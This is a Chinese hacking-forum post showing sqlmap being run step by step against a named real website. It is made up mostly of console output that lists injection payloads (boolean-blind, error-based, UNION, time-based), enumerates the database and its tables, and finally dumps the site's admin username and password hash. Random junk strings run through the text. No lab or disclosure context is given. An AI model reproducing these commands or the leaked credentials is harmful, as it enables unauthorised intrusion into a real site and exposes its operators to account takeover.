找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2312|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db/ j9 H' ?) H7 q# f9 O
ms "Mysql" --current-user       /*  注解:获取当前用户名称
5 p: e2 K% Q  S" i" W7 g    sqlmap/0.9 - automatic SQL injection and database takeover tool; D( U" \  z. O" J. a
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    ; ~% j# n1 G' G* E[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    # h% E( }; H4 c$ r! a, \+ d" B session file
    0 K- P$ A5 ~2 Y* R- o2 I[16:53:54] [INFO] resuming injection data from session file, d: {3 @- C. F3 d) v( f. t6 O
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file  |" [8 S3 X1 M1 `3 C  I# h
    [16:53:54] [INFO] testing connection to the target url
    5 @  g# O7 Q) m- b: v1 U8 gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    , a  \: [2 B& x) J2 @) P' D& \7 Wsts:6 c. J9 v" b* ^8 z
    ---
    # S  W9 ^# i( X. bPlace: GET
    ; l( l  L: a/ a, H# ~$ xParameter: id
    . m. N. T: n3 `/ Z/ E    Type: boolean-based blind
    1 {. c+ ^( x  Y    Title: AND boolean-based blind - WHERE or HAVING clause
    ) S3 i( e+ j$ ]! x+ }+ p+ b! ]9 Y    Payload: id=276 AND 799=799, v& B4 W! `5 x9 f8 D. r* E
        Type: error-based+ k# Q, T4 \  }% a
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 u5 K+ f% l5 G' @; c& G' {5 f5 b% ^
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    & p! ^( f: `8 b9 U- a) _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: k7 t' w$ S7 ?! E% u  y
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); s% x7 l7 J( N1 }* T2 {
        Type: UNION query7 D1 j2 Q: t4 y# t0 o& A; `
        Title: MySQL UNION query (NULL) - 1 to 10 columns3 I/ n' T# d/ y7 u
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    2 j* t( o5 G$ J2 q( Y4 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    4 @4 B+ ^7 H% U/ X/ LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    : U6 R2 m( |* Z+ F2 n+ ]+ C    Type: AND/OR time-based blind$ W6 B% _. Q3 E4 i; t$ m- Q
        Title: MySQL > 5.0.11 AND time-based blind4 L1 h$ F( x& t4 y3 q) Z
        Payload: id=276 AND SLEEP(5)8 Y% ^9 D! U. i+ ]
    ---6 Q  f* Y% t; ^: f4 W+ L: z
    [16:53:55] [INFO] the back-end DBMS is MySQL
    * l( C, Z0 x2 n& R0 H4 j5 ]web server operating system: Windows
    ( p$ }+ E9 B! K8 s. ^; C* Z9 iweb application technology: Apache 2.2.11, PHP 5.3.0
    1 f, i* {  h) C+ E" o" u8 Kback-end DBMS: MySQL 5.00 j7 b* H1 _/ w
    [16:53:55] [INFO] fetching current user6 J; p8 V; P: J* q
    current user:    'root@localhost'   ) Y8 N2 u9 A! M
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; s# {2 J2 n7 h3 e) e1 r
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58' Z' q! Q, d7 L6 @# P

    9 A- L$ E7 e0 a+ W% _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # R* F$ N, B$ Q" ]7 ^8 |' P& M  Rms "Mysql" --current-db                  /*当前数据库
    5 ^: u; I& A' ~; p    sqlmap/0.9 - automatic SQL injection and database takeover tool
    4 n$ ]& N7 ~8 m    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    + ~2 }  L! S  k: {  L  X# y[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    6 I; g, U& Q4 V9 L session file
    9 m: o4 k" E$ x8 v5 W[16:54:16] [INFO] resuming injection data from session file
    ' f0 S5 K* b9 q+ W8 t; s[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 U9 ?4 |) i- H2 k
    [16:54:16] [INFO] testing connection to the target url
    5 i) }3 G' o1 r- y6 m. F- Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque8 W$ l4 @# ~7 n& J8 z- C
    sts:
      e2 F; ?$ R" N, P( q---/ W( F& ^0 n+ |( t* u! i
    Place: GET
    / D; `. l; c8 \. g. h% RParameter: id* @7 a2 K6 v0 L: a5 E- j
        Type: boolean-based blind
    " f4 w$ \7 \/ @    Title: AND boolean-based blind - WHERE or HAVING clause3 T2 x  |+ S5 {' g8 R- R8 ~
        Payload: id=276 AND 799=7999 H  r6 q4 w) q: B8 f5 e
        Type: error-based
    # b3 Y; w  q9 t) S: ]    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      b) v. H& E5 M# J& P4 ]4 \    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
      D8 @' M& F% \( O: z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / T. d- Z/ j/ ]/ v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ; {9 _- C0 _" h1 i# B    Type: UNION query
    - C0 k- a! N$ P    Title: MySQL UNION query (NULL) - 1 to 10 columns7 |/ W& s1 W  \$ b4 H, @! ?
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ' M4 {- S% z# X+ u4 k# v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 U, `. v6 c; Y2 `) ?. q; x+ A  L, \: o
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    % T& o* q' e0 C5 J* x: R) j    Type: AND/OR time-based blind
    8 n# x9 A9 J3 n# x+ J0 Z# z    Title: MySQL > 5.0.11 AND time-based blind( s! Q# D/ T# D% H: }
        Payload: id=276 AND SLEEP(5)
    / i9 |: k* \5 H+ [4 l, o, y! x0 F---
    2 O5 q+ U) b9 _. M% u[16:54:17] [INFO] the back-end DBMS is MySQL( a5 l) o3 Y6 o' Y# {' S8 `
    web server operating system: Windows, ]0 o/ u; w/ E( q
    web application technology: Apache 2.2.11, PHP 5.3.0
    * r7 }/ {4 H+ Wback-end DBMS: MySQL 5.0/ H, G- X" }& y" N
    [16:54:17] [INFO] fetching current database9 l0 O1 i: P/ [9 F/ T4 W
    current database:    'wepost'
    , r& I) [) N! c. ?* c: |[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    # _1 L( x/ N" C8 htput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    $ x+ ^1 \* P! |( AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # ?) `( @: `& q" Ams "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名/ U1 u5 V8 K% B5 s
        sqlmap/0.9 - automatic SQL injection and database takeover tool/ V8 \- }6 z- ?3 `
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    + K0 t! J- ]% j' f. G' x4 O[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) O; f0 m$ h+ l. }; t) K* L  ]
    session file
    ' f2 ?, x* F( A9 g, x* a2 j[16:55:25] [INFO] resuming injection data from session file
    ! ^' O* Z' H( H" t6 i[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ! g6 U. T: g0 R, z, j3 z[16:55:25] [INFO] testing connection to the target url+ |1 L: k  b! `1 L* C
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 n0 ^9 ?2 h, D  d' n: ests:5 c3 V" F# p4 e& @8 z
    ---" s8 E- [3 }6 A+ E
    Place: GET, ]- {5 p4 ?, O/ v( d9 w" c
    Parameter: id- z/ ?! c# E8 D; d- g: L3 i$ ^
        Type: boolean-based blind! U' d1 D0 r& P1 G& {' @
        Title: AND boolean-based blind - WHERE or HAVING clause* o% b" C: O9 Z2 h' V0 ]
        Payload: id=276 AND 799=799+ `/ z6 V4 y/ V4 D! H6 m5 }
        Type: error-based
    2 _2 W  @' m  C2 o    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    & F$ [: |" `& Z- ]( ?* X; D    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    4 X, g. e2 h2 w2 U& ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ; q' v. ~- W0 D6 ^+ O),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 m2 @1 w0 G" I9 q) y
        Type: UNION query: }8 |6 @' M! l
        Title: MySQL UNION query (NULL) - 1 to 10 columns2 m  ?+ m' c1 v0 _' [" I
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ Q; a9 z& ^- y' q/ b
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; s! n# _0 G3 K" _, {
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 r8 Q3 V& ^/ C9 U( i7 Z& I4 L( L
        Type: AND/OR time-based blind
    8 {; V1 J( S% T2 o7 S( w8 G) ~4 _    Title: MySQL > 5.0.11 AND time-based blind# @* W3 O$ X4 s+ R
        Payload: id=276 AND SLEEP(5)/ @" V. j0 t3 s9 K
    ---
    0 u( d1 G  Z/ {3 r: Y! a[16:55:26] [INFO] the back-end DBMS is MySQL# w% v! O8 m. H$ E
    web server operating system: Windows3 j7 s, u, s9 t- N) y* o  E
    web application technology: Apache 2.2.11, PHP 5.3.09 N3 s$ [* j/ e6 G7 F9 _, U
    back-end DBMS: MySQL 5.00 n! }2 C6 N8 ^$ ^
    [16:55:26] [INFO] fetching tables for database 'wepost': h- @* N% \8 m% j  [
    [16:55:27] [INFO] the SQL query used returns 6 entries
    , c* T9 p" b) }( X* @, g/ ~Database: wepost8 K# R. H% I6 R* T) ~$ F/ k
    [6 tables]$ r6 _$ O/ N) ?
    +-------------+' |- K3 j; |! L( H- F  A
    | admin       |" P) b; @2 `! B1 ^6 s! p% j. ~
    | article     |
    2 T  J! V5 A7 w| contributor |8 J8 \' C! V5 A
    | idea        |& ?% S# r0 H/ T9 U1 {' }* o
    | image       |/ P2 f, X9 H8 B. T
    | issue       |
    6 N, |3 n: }. t) W+-------------+
    9 A+ [7 ~: y6 D" e5 j6 f+ }( c( {[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* Q8 o) ~& u8 y. Y; j
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33# d" ^/ k/ m) i0 p1 F* g" ?1 x
    2 X/ D; `  l: l& y- ^
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    5 b1 U) d8 ^. kms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    - x% i" T2 w6 v1 V, |    sqlmap/0.9 - automatic SQL injection and database takeover tool! H7 h/ s, y5 X" y3 v2 h; D, P
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    1 ?: M% v5 q* {0 W  c+ b) F9 Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    & L: N- V4 `8 Ssts:
    5 X" U9 M3 x1 S2 r% ]+ ~4 K---
    0 O* R. K8 }3 k" S' v5 M" PPlace: GET* K$ _3 i* W) [7 Q7 S- ^! t0 q
    Parameter: id
    $ I$ J7 n$ J% J6 b6 Z7 J    Type: boolean-based blind
    / v2 s- n- ^& D    Title: AND boolean-based blind - WHERE or HAVING clause0 T6 F- n+ B1 r; t1 A: i/ i
        Payload: id=276 AND 799=799
    % J! d1 r; ^  N    Type: error-based2 q  D% I8 P  i4 R' p! C6 ^% }
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 w0 Q5 _3 [1 r' H4 l: A3 w9 m
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% f, i- Z7 H) a8 g: m
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% T  O3 r7 _/ Z2 }' g% v
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! o  Z+ {# e. {, Z) f+ U6 ], K0 ^    Type: UNION query3 [6 t+ e: W% F& k
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ' u9 e# u9 t- o) C! E6 t    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    8 ^$ P$ h7 w& @: @% _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 a4 d0 _1 g( a( q: f' k( S
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    . E+ n5 r( b. m" `! S7 U8 H/ [    Type: AND/OR time-based blind8 c; x. a  e2 d
        Title: MySQL > 5.0.11 AND time-based blind3 d2 @7 `/ K. C- D4 a  ~7 n
        Payload: id=276 AND SLEEP(5)
      O# ^5 U1 ]: G+ Y---/ _9 Y; E1 T$ t/ ?& W8 q( g% c
    web server operating system: Windows
    * ]- b7 V6 f# _3 z! m: M6 Pweb application technology: Apache 2.2.11, PHP 5.3.0
    # q) K% h' E5 J9 \4 s  G. Eback-end DBMS: MySQL 5.0
    ; E* ?6 f& s9 G3 Y7 O0 P" j6 w" d[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se% K* z* ]3 h! \! u$ e$ r5 k
    ssion': wepost, wepost. n% o' X0 r2 z' M  Y: y7 ^7 M
    Database: wepost# P9 l+ v# Y* M' E1 _) ]: P, u
    Table: admin
    8 b! ]* X6 `% F8 @7 w0 D[4 columns]
    4 `, ]. j5 ^' |0 F+----------+-------------+9 ?0 P3 `5 ^3 p! {$ h: _
    | Column   | Type        |
    5 Y* |" Q, I: }% S4 p0 b+----------+-------------+
    7 L( ?& Y! N$ H| id       | int(11)     |+ j6 ]& k" K6 u2 s
    | password | varchar(32) |
    2 j8 I7 N8 n3 A5 m& Y9 D' k| type     | varchar(10) |$ m" B6 f( n9 o; X" O; u  T
    | userid   | varchar(20) |
    ( Z; `" j, w5 k/ I3 o) W5 ?+----------+-------------+# V- m8 w1 t" ?4 t8 C
  • shutting down at: 16:56:19
    ( m5 i1 l0 h( O9 J( n/ j6 b
    1 O$ Y# r  m3 d/ }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 t8 O* }7 N& j6 b/ _/ H
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    8 q: S2 Z, l4 I1 C    sqlmap/0.9 - automatic SQL injection and database takeover tool: r9 D5 y/ Q0 T! M. `% d
        http://sqlmap.sourceforge.net
  • starting at: 16:57:140 |$ o$ u0 `7 e4 ~
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque  N! r$ d2 m* ^# [8 F7 O4 A3 I
    sts:+ ]  p/ n0 ?% |) j/ y
    ---% _3 i; b9 P$ n
    Place: GET
    9 K3 j6 s4 _* N5 z2 y5 I" _0 C# oParameter: id5 G4 d8 ^4 \+ O: D( R% @: t5 w
        Type: boolean-based blind/ l3 o. u$ o& u
        Title: AND boolean-based blind - WHERE or HAVING clause1 v4 s" A6 R+ q" D
        Payload: id=276 AND 799=799
    ! V5 v0 R8 {, p/ R, F, t+ O    Type: error-based
    5 o" f' n- O2 D  ?; F    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: ?# X5 |( c- a9 h" X
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    : W" X  a$ V. I, G0 `- W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" n; W. O3 l* R  t( M& ^4 i* ^
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 Q# m- z; }- m- H
        Type: UNION query( Y2 H+ n* Z# k+ S2 z
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    2 ~, t  `. j# j4 @! T' h, {    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ T7 C2 N& D, w& `
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    " ~& ]. g/ ]) qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 |$ @1 G1 g' t; u& S
        Type: AND/OR time-based blind
    " c4 o+ k9 o6 _' B" X) u7 I! f9 ^1 t    Title: MySQL > 5.0.11 AND time-based blind
    2 j4 E' T4 V# t9 [! s! `6 J0 I* O& S    Payload: id=276 AND SLEEP(5)2 F% ?: ?3 n& M' j" }: H
    ---9 B- ^& x( X( Q$ ~1 T
    web server operating system: Windows# T1 s0 z/ h$ {- x; |0 C. {
    web application technology: Apache 2.2.11, PHP 5.3.00 w. x7 t4 G# R% M4 ?+ a
    back-end DBMS: MySQL 5.04 M, T4 \6 _2 G' f3 y% f
    recognized possible password hash values. do you want to use dictionary attack o1 j& o0 w0 ^0 j
    n retrieved table items? [Y/n/q] y- T7 N# v8 ?' B4 M5 }9 P
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]# q* B" _) u$ @% q
    do you want to use common password suffixes? (slow!) [y/N] y  Y% K$ N( v" m* I1 z. v0 d  Q
    Database: wepost
    - P' U9 T8 j: y% @Table: admin: L$ y- U7 S! p3 ?! L# R
    [1 entry]
    - z- G* X- A# F+----------------------------------+------------+
    - ?" V+ z) U! |( v* A| password                         | userid     |
    2 c  Y4 K- y* Y+ Y+----------------------------------+------------+$ W- u: g9 j0 k( u2 }& U; H9 w
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |2 B+ L5 z2 Q2 m8 S+ J6 w& H
    +----------------------------------+------------+  P$ E" s8 K: B; B6 x6 }; o* A
  • shutting down at: 16:58:14
    " }+ c/ B. r( }/ _4 _. K
    8 l* y% k, }$ j' s3 u, D: O3 cD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表